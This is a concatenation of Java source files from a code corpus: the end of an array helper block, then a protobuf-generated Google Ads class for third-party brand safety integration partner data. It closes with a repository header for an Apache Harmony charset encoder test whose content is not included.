Android-added: Helper methods to support custom method implementations. /* * Create a one-dimensional array of objects with the specified type. */ private static native Object createObjectArray(Class<?> componentType, int length) throws NegativeArraySizeException /*-[ return [IOSObjectArray arrayWithLength:length type:componentType]; ]-*/; private static IllegalArgumentException notAnArray(Object o) { throw new IllegalArgumentException("Not an array: " + o.getClass()); } private static IllegalArgumentException incompatibleType(Object o) { throw new IllegalArgumentException("Array has incompatible type: " + o.getClass()); } private static RuntimeException badArray(Object array) { if (array == null) { throw new NullPointerException("array == null"); } else if (!array.getClass().isArray()) { throw notAnArray(array); } else { throw incompatibleType(array); } } // END Android-added: Helper methods to support custom method implementations. }
googleads/google-ads-java
36,124
google-ads-stubs-v21/src/main/java/com/google/ads/googleads/v21/common/CampaignThirdPartyBrandSafetyIntegrationPartner.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v21/common/third_party_integration_partners.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v21.common; /** * <pre> * Container for third party brand safety integration data for Campaign. * Next Id = 3 * </pre> * * Protobuf type {@code google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner} */ public final class CampaignThirdPartyBrandSafetyIntegrationPartner extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner) CampaignThirdPartyBrandSafetyIntegrationPartnerOrBuilder { private static final long serialVersionUID = 0L; // Use CampaignThirdPartyBrandSafetyIntegrationPartner.newBuilder() to construct. private CampaignThirdPartyBrandSafetyIntegrationPartner(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CampaignThirdPartyBrandSafetyIntegrationPartner() { brandSafetyIntegrationPartner_ = 0; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new CampaignThirdPartyBrandSafetyIntegrationPartner(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnersProto.internal_static_google_ads_googleads_v21_common_CampaignThirdPartyBrandSafetyIntegrationPartner_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnersProto.internal_static_google_ads_googleads_v21_common_CampaignThirdPartyBrandSafetyIntegrationPartner_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner.class, com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner.Builder.class); } private int bitField0_; public static final int BRAND_SAFETY_INTEGRATION_PARTNER_FIELD_NUMBER = 1; private int brandSafetyIntegrationPartner_ = 0; /** * <pre> * Allowed third party integration partners for brand safety verification. * </pre> * * <code>.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner brand_safety_integration_partner = 1;</code> * @return The enum numeric value on the wire for brandSafetyIntegrationPartner. */ @java.lang.Override public int getBrandSafetyIntegrationPartnerValue() { return brandSafetyIntegrationPartner_; } /** * <pre> * Allowed third party integration partners for brand safety verification. * </pre> * * <code>.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner brand_safety_integration_partner = 1;</code> * @return The brandSafetyIntegrationPartner. */ @java.lang.Override public com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner getBrandSafetyIntegrationPartner() { com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner result = com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner.forNumber(brandSafetyIntegrationPartner_); return result == null ? com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner.UNRECOGNIZED : result; } public static final int BRAND_SAFETY_INTEGRATION_PARTNER_DATA_FIELD_NUMBER = 2; private com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brandSafetyIntegrationPartnerData_; /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. * </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> * @return Whether the brandSafetyIntegrationPartnerData field is set. */ @java.lang.Override public boolean hasBrandSafetyIntegrationPartnerData() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. * </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> * @return The brandSafetyIntegrationPartnerData. */ @java.lang.Override public com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData getBrandSafetyIntegrationPartnerData() { return brandSafetyIntegrationPartnerData_ == null ? com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData.getDefaultInstance() : brandSafetyIntegrationPartnerData_; } /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. * </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> */ @java.lang.Override public com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerDataOrBuilder getBrandSafetyIntegrationPartnerDataOrBuilder() { return brandSafetyIntegrationPartnerData_ == null ? com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData.getDefaultInstance() : brandSafetyIntegrationPartnerData_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (brandSafetyIntegrationPartner_ != com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner.UNSPECIFIED.getNumber()) { output.writeEnum(1, brandSafetyIntegrationPartner_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(2, getBrandSafetyIntegrationPartnerData()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (brandSafetyIntegrationPartner_ != com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner.UNSPECIFIED.getNumber()) { size += com.google.protobuf.CodedOutputStream .computeEnumSize(1, brandSafetyIntegrationPartner_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(2, getBrandSafetyIntegrationPartnerData()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner)) { return super.equals(obj); } com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner other = (com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner) obj; if (brandSafetyIntegrationPartner_ != other.brandSafetyIntegrationPartner_) return false; if (hasBrandSafetyIntegrationPartnerData() != other.hasBrandSafetyIntegrationPartnerData()) return false; if (hasBrandSafetyIntegrationPartnerData()) { if (!getBrandSafetyIntegrationPartnerData() .equals(other.getBrandSafetyIntegrationPartnerData())) return false; } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + BRAND_SAFETY_INTEGRATION_PARTNER_FIELD_NUMBER; hash = (53 * hash) + brandSafetyIntegrationPartner_; if (hasBrandSafetyIntegrationPartnerData()) { hash = (37 * hash) + BRAND_SAFETY_INTEGRATION_PARTNER_DATA_FIELD_NUMBER; hash = (53 * hash) + getBrandSafetyIntegrationPartnerData().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * Container for third party brand safety integration data for Campaign. * Next Id = 3 * </pre> * * Protobuf type {@code google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner) com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartnerOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnersProto.internal_static_google_ads_googleads_v21_common_CampaignThirdPartyBrandSafetyIntegrationPartner_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnersProto.internal_static_google_ads_googleads_v21_common_CampaignThirdPartyBrandSafetyIntegrationPartner_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner.class, com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner.Builder.class); } // Construct using com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3 .alwaysUseFieldBuilders) { getBrandSafetyIntegrationPartnerDataFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; brandSafetyIntegrationPartner_ = 0; brandSafetyIntegrationPartnerData_ = null; if (brandSafetyIntegrationPartnerDataBuilder_ != null) { brandSafetyIntegrationPartnerDataBuilder_.dispose(); brandSafetyIntegrationPartnerDataBuilder_ = null; } return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnersProto.internal_static_google_ads_googleads_v21_common_CampaignThirdPartyBrandSafetyIntegrationPartner_descriptor; } @java.lang.Override public com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner getDefaultInstanceForType() { return com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner build() { com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner buildPartial() { com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner result = new com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.brandSafetyIntegrationPartner_ = brandSafetyIntegrationPartner_; } int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000002) != 0)) { result.brandSafetyIntegrationPartnerData_ = brandSafetyIntegrationPartnerDataBuilder_ == null ? brandSafetyIntegrationPartnerData_ : brandSafetyIntegrationPartnerDataBuilder_.build(); to_bitField0_ |= 0x00000001; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner) { return mergeFrom((com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner other) { if (other == com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner.getDefaultInstance()) return this; if (other.brandSafetyIntegrationPartner_ != 0) { setBrandSafetyIntegrationPartnerValue(other.getBrandSafetyIntegrationPartnerValue()); } if (other.hasBrandSafetyIntegrationPartnerData()) { mergeBrandSafetyIntegrationPartnerData(other.getBrandSafetyIntegrationPartnerData()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 8: { brandSafetyIntegrationPartner_ = input.readEnum(); bitField0_ |= 0x00000001; break; } // case 8 case 18: { input.readMessage( getBrandSafetyIntegrationPartnerDataFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000002; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private int brandSafetyIntegrationPartner_ = 0; /** * <pre> * Allowed third party integration partners for brand safety verification. * </pre> * * <code>.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner brand_safety_integration_partner = 1;</code> * @return The enum numeric value on the wire for brandSafetyIntegrationPartner. */ @java.lang.Override public int getBrandSafetyIntegrationPartnerValue() { return brandSafetyIntegrationPartner_; } /** * <pre> * Allowed third party integration partners for brand safety verification. * </pre> * * <code>.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner brand_safety_integration_partner = 1;</code> * @param value The enum numeric value on the wire for brandSafetyIntegrationPartner to set. * @return This builder for chaining. */ public Builder setBrandSafetyIntegrationPartnerValue(int value) { brandSafetyIntegrationPartner_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * Allowed third party integration partners for brand safety verification. * </pre> * * <code>.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner brand_safety_integration_partner = 1;</code> * @return The brandSafetyIntegrationPartner. */ @java.lang.Override public com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner getBrandSafetyIntegrationPartner() { com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner result = com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner.forNumber(brandSafetyIntegrationPartner_); return result == null ? com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner.UNRECOGNIZED : result; } /** * <pre> * Allowed third party integration partners for brand safety verification. * </pre> * * <code>.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner brand_safety_integration_partner = 1;</code> * @param value The brandSafetyIntegrationPartner to set. * @return This builder for chaining. */ public Builder setBrandSafetyIntegrationPartner(com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner value) { if (value == null) { throw new NullPointerException(); } bitField0_ |= 0x00000001; brandSafetyIntegrationPartner_ = value.getNumber(); onChanged(); return this; } /** * <pre> * Allowed third party integration partners for brand safety verification. * </pre> * * <code>.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner brand_safety_integration_partner = 1;</code> * @return This builder for chaining. */ public Builder clearBrandSafetyIntegrationPartner() { bitField0_ = (bitField0_ & ~0x00000001); brandSafetyIntegrationPartner_ = 0; onChanged(); return this; } private com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brandSafetyIntegrationPartnerData_; private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData, com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData.Builder, com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerDataOrBuilder> brandSafetyIntegrationPartnerDataBuilder_; /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. * </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> * @return Whether the brandSafetyIntegrationPartnerData field is set. */ public boolean hasBrandSafetyIntegrationPartnerData() { return ((bitField0_ & 0x00000002) != 0); } /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. * </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> * @return The brandSafetyIntegrationPartnerData. */ public com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData getBrandSafetyIntegrationPartnerData() { if (brandSafetyIntegrationPartnerDataBuilder_ == null) { return brandSafetyIntegrationPartnerData_ == null ? com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData.getDefaultInstance() : brandSafetyIntegrationPartnerData_; } else { return brandSafetyIntegrationPartnerDataBuilder_.getMessage(); } } /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. * </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> */ public Builder setBrandSafetyIntegrationPartnerData(com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData value) { if (brandSafetyIntegrationPartnerDataBuilder_ == null) { if (value == null) { throw new NullPointerException(); } brandSafetyIntegrationPartnerData_ = value; } else { brandSafetyIntegrationPartnerDataBuilder_.setMessage(value); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. * </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> */ public Builder setBrandSafetyIntegrationPartnerData( com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData.Builder builderForValue) { if (brandSafetyIntegrationPartnerDataBuilder_ == null) { brandSafetyIntegrationPartnerData_ = builderForValue.build(); } else { brandSafetyIntegrationPartnerDataBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. * </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> */ public Builder mergeBrandSafetyIntegrationPartnerData(com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData value) { if (brandSafetyIntegrationPartnerDataBuilder_ == null) { if (((bitField0_ & 0x00000002) != 0) && brandSafetyIntegrationPartnerData_ != null && brandSafetyIntegrationPartnerData_ != com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData.getDefaultInstance()) { getBrandSafetyIntegrationPartnerDataBuilder().mergeFrom(value); } else { brandSafetyIntegrationPartnerData_ = value; } } else { brandSafetyIntegrationPartnerDataBuilder_.mergeFrom(value); } if (brandSafetyIntegrationPartnerData_ != null) { bitField0_ |= 0x00000002; onChanged(); } return this; } /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. * </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> */ public Builder clearBrandSafetyIntegrationPartnerData() { bitField0_ = (bitField0_ & ~0x00000002); brandSafetyIntegrationPartnerData_ = null; if (brandSafetyIntegrationPartnerDataBuilder_ != null) { brandSafetyIntegrationPartnerDataBuilder_.dispose(); brandSafetyIntegrationPartnerDataBuilder_ = null; } onChanged(); return this; } /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. * </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> */ public com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData.Builder getBrandSafetyIntegrationPartnerDataBuilder() { bitField0_ |= 0x00000002; onChanged(); return getBrandSafetyIntegrationPartnerDataFieldBuilder().getBuilder(); } /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. * </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> */ public com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerDataOrBuilder getBrandSafetyIntegrationPartnerDataOrBuilder() { if (brandSafetyIntegrationPartnerDataBuilder_ != null) { return brandSafetyIntegrationPartnerDataBuilder_.getMessageOrBuilder(); } else { return brandSafetyIntegrationPartnerData_ == null ? com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData.getDefaultInstance() : brandSafetyIntegrationPartnerData_; } } /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. * </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData, com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData.Builder, com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerDataOrBuilder> getBrandSafetyIntegrationPartnerDataFieldBuilder() { if (brandSafetyIntegrationPartnerDataBuilder_ == null) { brandSafetyIntegrationPartnerDataBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData, com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData.Builder, com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerDataOrBuilder>( getBrandSafetyIntegrationPartnerData(), getParentForChildren(), isClean()); brandSafetyIntegrationPartnerData_ = null; } return brandSafetyIntegrationPartnerDataBuilder_; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner) private static final com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner(); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CampaignThirdPartyBrandSafetyIntegrationPartner> PARSER = new com.google.protobuf.AbstractParser<CampaignThirdPartyBrandSafetyIntegrationPartner>() { @java.lang.Override public CampaignThirdPartyBrandSafetyIntegrationPartner parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CampaignThirdPartyBrandSafetyIntegrationPartner> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CampaignThirdPartyBrandSafetyIntegrationPartner> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
apache/harmony
33,540
classlib/modules/nio_char/src/test/java/tests/api/java/nio/charset/CharsetEncoderTest.java
